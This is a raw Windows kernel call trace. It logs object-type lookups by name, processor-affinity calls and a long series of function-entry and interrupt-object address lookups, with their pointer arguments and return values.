| ObfDereferenceObject | Object_ptr = 0xffffe0003a485f20, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\Profile, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a46beb0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a46beb0, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\KeyedEvent, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a46bd50, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a46bd50, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\WindowStation, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a45bf20, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a45bf20, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\Desktop, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a45bdc0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a45bdc0, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\Composition, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a48ef20, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a48ef20, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\RawInputManager, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a48edc0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a48edc0, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\TpWorkerFactory, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a450f20, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a450f20, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\Adapter, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a450dc0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a450dc0, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\Controller, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a470f20, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a470f20, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\Device, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a470dc0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a470dc0, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\Driver, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a452f20, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a452f20, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\IoCompletion, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a452dc0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a452dc0, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\WaitCompletionPacket, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a468f20, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a468f20, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\File, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a468dc0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a468dc0, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\TmTm, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a45ef20, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a45ef20, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\TmTx, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a45edc0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a45edc0, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\TmRm, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a48cf20, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a48cf20, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\TmEn, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a48cdc0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a48cdc0, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\Section, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a454f20, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a454f20, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\Session, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a454dc0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a454dc0, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\Partition, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a48df20, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a48df20, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\Key, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a49ef20, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a49ef20, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\ALPC Port, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a49cd70, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a49cd70, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\PowerRequest, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a490cd0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a490cd0, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\WmiGuid, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a4c2cd0, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a4c2cd0, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\EtwRegistration, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a4a5d00, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a4a5d00, ret_val_ptr_out = 0x2 |
| ObReferenceObjectByName | ObjectName = \ObjectTypes\EtwConsumer, Attributes = 0x0, PassedAccessState_unk = 0x0, DesiredAccess_unk = 0x0, ObjectType_unk = 0xffffe0003a451df0, AccessMode_unk = 0xffffd0002d206a00, ParseContext_ptr = 0x0, ParseContext_ptr_out = 0x0, Object_ptr_out = 0xffffd0002d206ca0, Object_out = 0xffffe0003a4a3d00, ret_val_out = 0x0 |
| ObfDereferenceObject | Object_ptr = 0xffffe0003a4a3d00, ret_val_ptr_out = 0x2 |
| KeProcessorGroupAffinity | ret_val_out = 0x1 |
| KeSetSystemGroupAffinityThread | Affinity_unk = 0xffffd0002d206fa8, PreviousAffinity_unk_out = 0x0 |
| KeRevertToUserAffinityThread | - |
| KeProcessorGroupAffinity | ret_val_out = 0x1 |
| KeSetSystemGroupAffinityThread | Affinity_unk = 0xffffd0002d207020, PreviousAffinity_unk_out = 0x0 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417cdd00, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c86a4 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417cde00, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c86b0 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417cdfc0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c86bc |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417ce340, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c86d4 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417ce440, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c86e0 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417ce540, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c86ec |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417ce7c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c86f8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417cea00, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c8704 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417ceac0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c8710 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417ceb80, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c871c |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417cec40, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c8728 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417ced00, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c8734 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417cee40, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c8740 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417cef80, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c874c |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417cf080, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c8758 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a3ff8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7e08, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417cf440, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c8764 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417cf5c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c8770 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417cf6c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c877c |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417cfd40, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c87a0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4020 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7e30, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4028 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7e38, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4030 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7e40, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4038 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7e48, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4040 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7e50, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4048 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7e58, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4050 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7e60, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4058 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7e68, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4060 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7e70, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4068 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7e78, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4070 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7e80, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c90b0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c8200 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417cd430, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c85a8 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4088 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7e98, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4090 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7ea0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4098 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7ea8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a40a0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7eb0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a40a8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7eb8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a40b0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7ec0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a40b8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7ec8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a40c0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7ed0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417cff00, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c87ac |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a40d0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7ee0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a40d8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7ee8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417d0000, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c87b8 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417d0100, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c87c4 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a40f0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7f00, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c9380, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c8218 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c95b0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c8230 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c9910, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c823c |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c9c60, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c8248 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
